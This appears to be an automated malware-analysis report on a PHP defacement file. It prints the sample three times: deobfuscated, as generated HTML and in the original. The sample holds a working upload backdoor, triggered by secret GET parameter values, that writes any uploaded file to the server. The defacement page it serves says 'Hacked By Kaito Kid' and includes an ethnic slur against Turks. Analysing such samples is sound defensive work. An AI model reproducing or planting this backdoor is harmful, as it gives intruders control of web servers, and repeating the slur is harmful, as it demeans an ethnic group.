PHP Malware Analysis
index
md5: e96bd4eb7cccd36b406cfbac04e4e5cd
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Environment
- error_reporting (Deobfuscated, HTML, Original)
Files
- move_uploaded_file (Deobfuscated, HTML, Original)
Input
- _FILES (Deobfuscated, HTML, Original)
- _GET (Deobfuscated, HTML, Original)
Title
- kurdish (Deobfuscated, Original)
URLs
- https://b.top4top.io/p_2142vmax51.jpg (Deobfuscated, HTML, Original)
- https://d.top4top.io/p_2142fzerk2.jpg (Deobfuscated, HTML, Original)
- https://j.top4top.io/m_2142g2zbz1.mp3 (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<?php
error_reporting(0);
if ($_GET['Fox'] == 'TYewh') {
$saw1 = $_FILES['file']['tmp_name'];
$saw2 = $_FILES['file']['name'];
echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>";
move_uploaded_file($saw1, $saw2);
exit(0);
}
error_reporting(0);
if ($_GET['Fox'] == 'DZeU2') {
$saw1 = $_FILES['file']['tmp_name'];
$saw2 = $_FILES['file']['name'];
echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>";
move_uploaded_file($saw1, $saw2);
exit(0);
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title>kurdish</title>
<style>
body{
background-image: url("https://b.top4top.io/p_2142vmax51.jpg");
background-size: 100%;
}
#i{
opacity: 0.5;
}
</style></head><body>
<div style="color: white;" id="h">
<div style="text-align: right;">
</div>
<h1 style="text-align: center;"><big><big><big><big><span style="color: rgb(51, 0, 51);">Hacked</span> <span style="color: rgb(51, 51, 255);">By</span> <span style="color: red;">Kai</span>t<span style="color: yellow;">o </span>K<span style="color: rgb(255, 153, 0);">id</span></big></big></big></big></h1>
</div>
<div style="text-align: center;">
<div id="i" style="text-align: center;"><br>
<br>
<br>
<img style="width: 700px; height: 700px;" src="https://d.top4top.io/p_2142fzerk2.jpg"><br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
</div>
<big style="color: black;"><big><big><big><big><big><big><big><big><big>Fuck Turkish<br>
<br>
<br>
<br>
</big></big></big></big></big></big></big></big></big></big>
<audio controls autoplay>
<source src="https://j.top4top.io/m_2142g2zbz1.mp3" type="audio/ogg">
</audio>
</div>
</body></html>Execution traces
Generated HTML code
<html><head><meta name="color-scheme" content="light dark"></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;"><?php error_reporting(0); if($_GET['Fox'] == 'TYewh'){$saw1 = $_FILES['file']['tmp_name'];$saw2 = $_FILES['file']['name'];echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>"; move_uploaded_file($saw1,$saw2); exit(0); } ?>
<?php error_reporting(0); if($_GET['Fox'] == 'DZeU2'){$saw1 = $_FILES['file']['tmp_name'];$saw2 = $_FILES['file']['name'];echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>"; move_uploaded_file($saw1,$saw2); exit(0); } ?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title>kurdish</title>
<style>
body{
background-image: url("https://b.top4top.io/p_2142vmax51.jpg");
background-size: 100%;
}
#i{
opacity: 0.5;
}
</style></head><body>
<div style="color: white;" id="h">
<div style="text-align: right;">
</div>
<h1 style="text-align: center;"><big><big><big><big><span style="color: rgb(51, 0, 51);">Hacked</span> <span style="color: rgb(51, 51, 255);">By</span> <span style="color: red;">Kai</span>t<span style="color: yellow;">o </span>K<span style="color: rgb(255, 153, 0);">id</span></big></big></big></big></h1>
</div>
<div style="text-align: center;">
<div id="i" style="text-align: center;"><br>
<br>
<br>
<img style="width: 700px; height: 700px;" src="https://d.top4top.io/p_2142fzerk2.jpg"><br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
</div>
<big style="color: black;"><big><big><big><big><big><big><big><big><big>Fuck Turkish<br>
<br>
<br>
<br>
</big></big></big></big></big></big></big></big></big></big>
<audio controls autoplay>
<source src="https://j.top4top.io/m_2142g2zbz1.mp3" type="audio/ogg">
</audio>
</div>
</body></html></pre></body></html>Original PHP code
<?php error_reporting(0); if($_GET['Fox'] == 'TYewh'){$saw1 = $_FILES['file']['tmp_name'];$saw2 = $_FILES['file']['name'];echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>"; move_uploaded_file($saw1,$saw2); exit(0); } ?>
<?php error_reporting(0); if($_GET['Fox'] == 'DZeU2'){$saw1 = $_FILES['file']['tmp_name'];$saw2 = $_FILES['file']['name'];echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>"; move_uploaded_file($saw1,$saw2); exit(0); } ?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title>kurdish</title>
<style>
body{
background-image: url("https://b.top4top.io/p_2142vmax51.jpg");
background-size: 100%;
}
#i{
opacity: 0.5;
}
</style></head><body>
<div style="color: white;" id="h">
<div style="text-align: right;">
</div>
<h1 style="text-align: center;"><big><big><big><big><span style="color: rgb(51, 0, 51);">Hacked</span> <span style="color: rgb(51, 51, 255);">By</span> <span style="color: red;">Kai</span>t<span style="color: yellow;">o </span>K<span style="color: rgb(255, 153, 0);">id</span></big></big></big></big></h1>
</div>
<div style="text-align: center;">
<div id="i" style="text-align: center;"><br>
<br>
<br>
<img style="width: 700px; height: 700px;" src="https://d.top4top.io/p_2142fzerk2.jpg"><br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
</div>
<big style="color: black;"><big><big><big><big><big><big><big><big><big>Fuck Turkish<br>
<br>
<br>
<br>
</big></big></big></big></big></big></big></big></big></big>
<audio controls autoplay>
<source src="https://j.top4top.io/m_2142g2zbz1.mp3" type="audio/ogg">
</audio>
</div>
</body></html>